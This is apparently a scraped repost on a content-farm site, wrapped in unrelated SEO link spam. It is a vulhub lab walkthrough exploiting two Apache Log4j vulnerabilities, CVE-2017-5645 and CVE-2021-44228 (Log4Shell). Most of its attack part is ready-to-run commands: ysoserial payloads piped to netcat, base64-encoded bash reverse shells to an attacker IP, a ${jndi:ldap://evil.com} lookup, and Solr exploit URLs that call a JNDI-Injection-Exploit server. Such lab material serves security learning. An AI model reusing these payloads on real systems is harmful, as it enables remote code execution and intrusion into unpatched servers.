当前位置: 首页 > news >正文

网站网络排名优化方法企业培训课程名称

网站网络排名优化方法,企业培训课程名称,南充做网站电话,如何提升做网站的效率一.Log4j反序列化命令执行漏洞(CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码 环境:vulhub 工具下载地址&#xff1…

一.Log4j反序列化命令执行漏洞(CVE-2017-5645)

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码

环境:vulhub
工具下载地址:
ysoserial

利用工具生成payload:

#创建文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/test" | nc 192.168.85.128 4712#反弹shell
#把 bash -i >& /dev/tcp/192.168.85.129/4466 0>&1进行base64编码
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44NS4xMjkvNDQ2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.85.128 4712

1.创建文件 进入容器内部,查看文件创建成功

docker ps
docker exec -it 19bdcb0184e1 /bin/bash
cd /tmp 
ls

2.查看反弹的shell
有点问题没反弹成功,应该是这样做的

nc -lvvp 4466

​二.Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码

环境:vulhub
工具下载地址:
JNDI-Injection-Exploit
1.利用dnslog平台检测是否有漏洞

后面换成dnslong平台的域名
http://192.168.85.128:8983/solr/admin/cores?action=${jndi:ldap://yahs0y.dnslog.cn}

在这里插入图片描述
2.利用工具反弹shell
(1)使用工具生成payload

1.把bash -i >& /dev/tcp/192.168.85.129/4444 0>&1进行base64编码 填入echo后,-A参数后填入攻击机的ip
2.利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.85.129

(2)选用一个作为url action后的payload,访问此url
这里选用第一个,下面的url访问

http://192.168.85.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.85.129:1099/itx5mr}

(3)攻击机开启监听

nc -lvvp 4444

在这里插入图片描述

参考文章:
CVE-2021-44228

http://www.ds6.com.cn/news/8154.html

相关文章:

  • 网站开发的基本技术写软文怎么接单子
  • 做淘宝店招的网站怎样推广自己的网站
  • 做网站怎么宣传运营微营销推广软件
  • 日语网站建设市场电商运营公司排名
  • 1g网站空间网站策划方案范文
  • app定制小程序开发win10优化大师好用吗
  • fview网站开发友情链接平台站长资源
  • 深圳网站建设哪家好怀化seo推广
  • 旅行网站建设的规划书谷歌seo博客
  • 网站备案号怎么放怎么在网上做广告宣传
  • 蓝海国际版网站建设深圳营销型网站定制
  • 找人做网站注意事项产品推广方案范例
  • 20年的域名做网站怎么样温州百度推广公司电话
  • wordpress不能后台seo优化点击软件
  • django网站开发视频品牌营销成功案例
  • 网站色彩的应用seo需要掌握哪些技术
  • 给一个公司做网站需要多久运营商推广5g技术
  • 如何看网站的关键词网站流量查询工具
  • 购物分享网站怎么做的今天的新闻内容
  • 制作一个网站平台网络新闻发布平台
  • 云南政务网站建设电商网站开发平台有哪些
  • 舟山网站建设公众号推广方案
  • 百度站长平台网站提交三只松鼠网络营销策划书
  • 4k视频素材网站湖南百度推广
  • 南沙移动网站建设盘多多百度网盘搜索引擎
  • 有没有专门做二手车网站seo培训一对一
  • 园林景观设计网站推荐2024新闻热点摘抄
  • 网站建设的维护工作网站页面分析
  • 主题在wordpress泾县网站seo优化排名
  • 景区网站的建设公司怎么注册网站平台